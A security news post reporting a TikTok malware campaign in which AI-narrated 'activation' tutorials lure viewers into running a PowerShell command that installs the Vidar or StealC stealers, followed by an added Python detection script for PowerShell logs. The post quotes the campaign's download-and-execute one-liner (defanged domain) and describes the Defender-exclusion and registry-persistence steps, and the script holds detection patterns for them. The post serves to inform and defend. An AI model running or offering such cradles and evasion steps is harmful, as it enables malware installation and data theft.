NEWS Forget Email Viruses—Now Hackers Infect Devices Through TikTok Videos

ExcalibuR



Half a million views, thousands of infected devices. How do they do it?

Cybercriminals are increasingly using TikTok—not to follow trends, but to spread malware. A new campaign uncovered by Trend Micro leverages the platform to deliver StealC and Vidar backdoors. The videos appear as harmless tutorials—teaching users how to "activate" software like Windows or Spotify—but they’re voiced by AI-generated narrators and show no real person on screen.

How the Attack Works

Unlike traditional malware campaigns, there are no suspicious links or commands in the video descriptions. Instead, victims manually type a PowerShell command after seeing it displayed in the video. One such clip amassed over 500,000 views, highlighting the scale of the threat.

The Malicious Chain:

  1. The user follows the "tutorial," pressing Win + R and pasting a PowerShell command like:

    iwr hxxps://allaivo.me/spotify -UseBasicParsing | iex

  2. The script:
    • Creates hidden directories in %APPDATA% and %LOCALAPPDATA%.
    • Adds them to Windows Defender exclusions.
    • Downloads and executes Vidar or StealC from a remote server.
  3. The malware persists via registry autostart and connects to C2 servers, some disguised as legitimate platforms like Steam and Telegram for stealth.

Why This is Dangerous

  • No Exploits Needed: The attack relies entirely on social engineering, bypassing traditional security checks.
  • Hard to Detect: Malicious traffic blends in with normal Steam/Telegram connections.
  • Viral Spread: TikTok’s algorithm amplifies malicious content rapidly.

Who’s Behind It?

Accounts like @gitallowed and @zane.houghton (now banned) were linked to the campaign. But new ones can emerge anytime—any user uploading similar videos becomes a potential infection vector.

How to Defend Against It

  • Monitor OSINT trends—track emerging threats in social media.
  • Use behavioral analytics—flag unusual PowerShell activity.
  • Train employees—teach them to recognize visual phishing.
  • Deploy anomaly detection—look for IOCs beyond standard malware signatures.
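As an added example (not from the original post or the Trend Micro report), here is the "flag unusual PowerShell activity" advice as a small triage script run over constructed script-block log lines: it matches the stages of the chain described above (download cradle, Defender exclusion, %APPDATA%/%LOCALAPPDATA% paths, Run-key persistence) and aggregates hits per host so the multi-step chain surfaces even when each step lands in a separate event. The log line format, rule weights and threshold are assumptions.

```python
import re

# Constructed sample log lines (PowerShell script-block events), not real telemetry.
# WS01 mirrors the chain from the post; WS02 is benign admin activity.
SAMPLE_LOGS = [
    r'EID=4104 Host=WS01 ScriptBlock="iwr hxxps://allaivo.me/spotify -UseBasicParsing | iex"',
    r'EID=4104 Host=WS01 ScriptBlock="Add-MpPreference -ExclusionPath $env:APPDATA\x1"',
    r'EID=4104 Host=WS01 ScriptBlock="Set-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name upd -Value $env:LOCALAPPDATA\x1\a.exe"',
    r'EID=4104 Host=WS02 ScriptBlock="Get-ChildItem C:\Users | Measure-Object"',
]

# Assumed log layout: "... Host=<name> ScriptBlock="<code>"" on one line.
LINE_RE = re.compile(r'Host=(?P<host>\S+)\s+ScriptBlock="(?P<sb>.*)"$')

# (rule name, pattern, weight). Weights are an assumption, not vendor scores:
# a download cradle alone is enough to flag; the other stages raise confidence.
RULES = [
    ("download_cradle",
     re.compile(r"\b(iwr|invoke-webrequest|curl|wget)\b.*\|\s*(iex|invoke-expression)\b", re.I), 5),
    ("defender_exclusion",
     re.compile(r"add-mppreference\s+-exclusion(path|process|extension)", re.I), 4),
    ("appdata_drop",
     re.compile(r"(%appdata%|%localappdata%|\$env:appdata|\$env:localappdata)", re.I), 1),
    ("run_key_persistence",
     re.compile(r"currentversion\\run\b", re.I), 3),
]

def match_rules(script_block):
    """Return the names of every rule the script block triggers, in RULES order."""
    return [name for name, rx, _ in RULES if rx.search(script_block)]

def score(hits):
    """Sum the weights of the distinct rules in `hits`."""
    return sum(w for name, _, w in RULES if name in hits)

def triage(lines, threshold=4):
    """Aggregate rule hits per host; return {host: {"hits": [...], "score": n}}
    for hosts whose combined score reaches the threshold."""
    per_host = {}
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # not a script-block event in the assumed layout
        hits = match_rules(m["sb"])
        if hits:
            per_host.setdefault(m["host"], set()).update(hits)
    return {h: {"hits": sorted(s), "score": score(s)}
            for h, s in per_host.items() if score(s) >= threshold}

if __name__ == "__main__":
    for host, info in triage(SAMPLE_LOGS).items():
        print(f"{host}: score={info['score']} stages={info['hits']}")
```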

The Bigger Picture

As TikTok’s reach grows, so does its abuse by hackers. Malware no longer hides in code—it hides in plain sight, disguised as a trending "how-to" video. Staying vigilant is the only defense.